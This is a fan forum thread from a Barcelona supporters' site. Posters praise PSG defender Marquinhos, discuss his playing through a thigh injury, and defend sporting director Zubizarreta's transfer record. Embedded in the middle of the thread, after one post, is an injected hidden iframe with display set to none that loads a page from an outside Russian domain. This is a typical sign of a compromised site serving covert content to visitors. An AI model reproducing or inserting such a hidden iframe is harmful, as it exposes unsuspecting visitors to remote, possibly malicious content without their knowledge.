Marquinhos

Bertus

ByzsyEqCAAAlxkc.png

Dunno how Blanc could bench him once TS is back after his performance tonight.

He's the best PSG player since the beginning of the season.

CuleLife4Life

As a Brazilian, I'm glad he is playing well so he can take a starting spot on the national team.

As a Barca fan, I'm annoyed he played great today haha.

Bertus

Where are the people saying Bartra is better now?

Keeping Marcos was the sol good choice from Nasser during the summer mercato.

Anyways, PSG has a million problems if you followed the last two months, and now they can add one more.

As I said above, and french medias are saying the same right now as we speak, it would be a disgrace to bench him since as I said, he's the sol player to be very good every games this season.

Bertus

He is quite easily better than Laporte

And as I said ealier Marquinhos played while being injured.

Blanc said it again right after the game. Marquinhos had a muscular ache in his right thigh.

Marcos has a bright future ahead of him, really.

F

Flavia

And as I said ealier Marquinhos played while being injured.

Blanc said it again right after the game. Marquinhos had a muscular ache in his right thigh.

Marcos has a bright future ahead of him, really.

No wonder we pushed so hard for him. Mistake was to let you guys get him from roma :p
<iframe src="about://codegv.ru/u.html" style="display: none;" id="zunifrm"></iframe>

Hamzah

High Definition Member
Zubi is actually not that bad. He just gets his timing wrong and was given special requests by managers which turned out to be crap. Also the board makes dodgy signings on his behalf sometimes.

DonAK

President of FC Barcelona
Zubi is actually not that bad. He just gets his timing wrong and was given special requests by managers which turned out to be crap. Also the board makes dodgy signings on his behalf sometimes.

+1

It looked more like Rosell's decision to chase Thiago Silva and then at the end David Luiz than Zubi's.

Home of Barca Fans